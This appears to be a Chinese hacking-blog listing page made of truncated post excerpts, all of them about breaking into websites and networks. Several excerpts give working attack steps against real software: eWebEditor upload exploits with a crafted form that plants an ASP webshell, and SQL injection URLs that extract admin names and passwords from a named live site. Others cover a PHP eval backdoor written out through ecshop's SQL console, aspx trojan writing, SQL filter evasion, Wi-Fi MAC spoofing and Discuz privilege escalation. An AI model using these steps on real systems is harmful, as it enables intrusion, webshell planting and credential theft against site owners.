作者 ：  kevin 群里有人发了个shell （http://sb.sb/1.aspx admin 求提权） 一看觉得奇怪，有这样的域名吗，后来问下，原来是还得修改本地的host文件 （xx.xx.xx.xx sb.sb） 纯属无聊吗，直接旁注工具草起来， （不知道为什么，IP直接查的域名，再用域名来查，显示的IP不一样。） 不管了，都查了，就直接用域名上了，最简单的方式拿到了站的后台和管理（啊D） 垃圾网站，什么都没有，就一个编辑器，看下还是早起的版本V 1.0.0   百度找了一下编辑器的漏洞，看到 ewebeditor 1.0.0 上传漏洞： <H1>ewebedito...

漏洞类型：文件上传 漏洞描述：86CMS建站系统采用ewebeditor编辑器，可上传恶意代码攻击网站。 漏洞测试： 调用编辑器上传建立1.asp文件夹。 http://www.176ku.com/admin/cms86eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp 访问这个地址可以建立个1.asp的文件夹…… 再用这个html代码上传图片格式WEBSHELL。 <form action=http://www.176ku.com/admin/cms86eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp method=post n...

影响版本：V4.0 官方地址：www.foosun.net 漏洞类型：SQL注入 漏洞描述：风讯的注册页面…/user/SetNextOptions.asp存在SQL注入漏洞   利用方法： 构造注入 http://www.176ku.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin “admin_name” 管理用户名数据库表 http://www.176ku.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8...

通过后台写入执行代码，直接拿到webshell，从而掌握服务器权限。 1、访问http://127.0.0.1/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default，写入aspx木马。 2、写入aspx木马后，访问http://127.0.0.1/tools/rss.aspx就可以了。

http://www.xxx.com/admin/ewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp 这样会在 网站目录下生产 a.asp这个文件、 然后再本地构造html  <form action=”http://www.xxx.com/admin/ewebeditor/asp/upload.asp?action=savetype=image&style=popup&cusdir=a.asp” method=post name=myform enctype=”multipart/form-data”> <input type=file name=uploadfile size=100><br><br> <input type=submit value=upload> </form&...

最近想弄个ecshop做销售。装好ecshop V2.7.2版本之后，测试后台拿shell。 本人整理给自己看的，大家飘过就好。BY:黑猫 ecshop后台拿shell 个人总结七种方法 一、（本人测试已经失效） 系统==>数据库管理==>sql查询（可爆出物理路径）： ==============创建表失败，导不出shell====================== show databases; use 数据库名; create a(cmd text not null); insert into a(cmd) values(‘<?php eval($_POST[cmd]);?>’); select cmd from a into outfile ‘导出路径’; dro...

对于SQL语句，大家还都习惯于其的空格，比如select id from [name]，如果中间没有了空格，那就成了selectidfrom[name]， 一滩糊涂！ 对于空格，有许多替换方式，比如TAB空格，SQL数据库中的/**/，除了上面所说到几个空格的替代方法外，我发现用()括号在SQL中一样可以运行，比如上面的语句，就可以写成，select(id)from[name]，有括号分隔，可以正常执行。 举个例 子说一下，我们得到一个注入点：jmdcw.asp?name=aa’and 1=1 and ”=’，如果替换其中的1=1为查询管理员的密码的语句： (selec...

By：iCorn 对于破解无线路由密码后不能上网的情况，我简单的讲一下，只是一个思路。供新手参考。 在使用BT或者奶瓶破解无线路由密码后，发现网卡受限或者无法获取到IP地址。 那最常见的原因就是： 一：机主在路由防火墙里设置MAC过滤 针对这种情况，你需要先自己设置一个局域网IP（比如192.168.1.100），然后用科来网络分析系统，嗅探出局域网内活动主机的IP地址和MAC 地址。记录这些MAC值，然后用KMAC等修改网卡地址的软件，修改本机MAC地址。通过这样的伪造，一般是可以顺利上网了。但是，要注意，...

关键要知道管理员权限在数据库中对应的位置 假设discuz的数据库前缀是cdb_ uclient的前缀是 uc_ 分别执行 查询表结构 describe uc_members; 查询sunshine用户名的信息 select * from uc_members where name=”sunshine”; 2xxx79是上面查询到的uid字段值 insert into uc_admins values(2xxx79, “sunshine”, 1,1,1,1,1,1,1,1,1,1,1,1); 这样就在uc里面将sunshine用户提升为管理员权限。 如果想要用使用uc网站创始者权限，就要修改ucclient下的data/config.inc.php文件 修改 define(‘UC_FOUNDERPW’, R...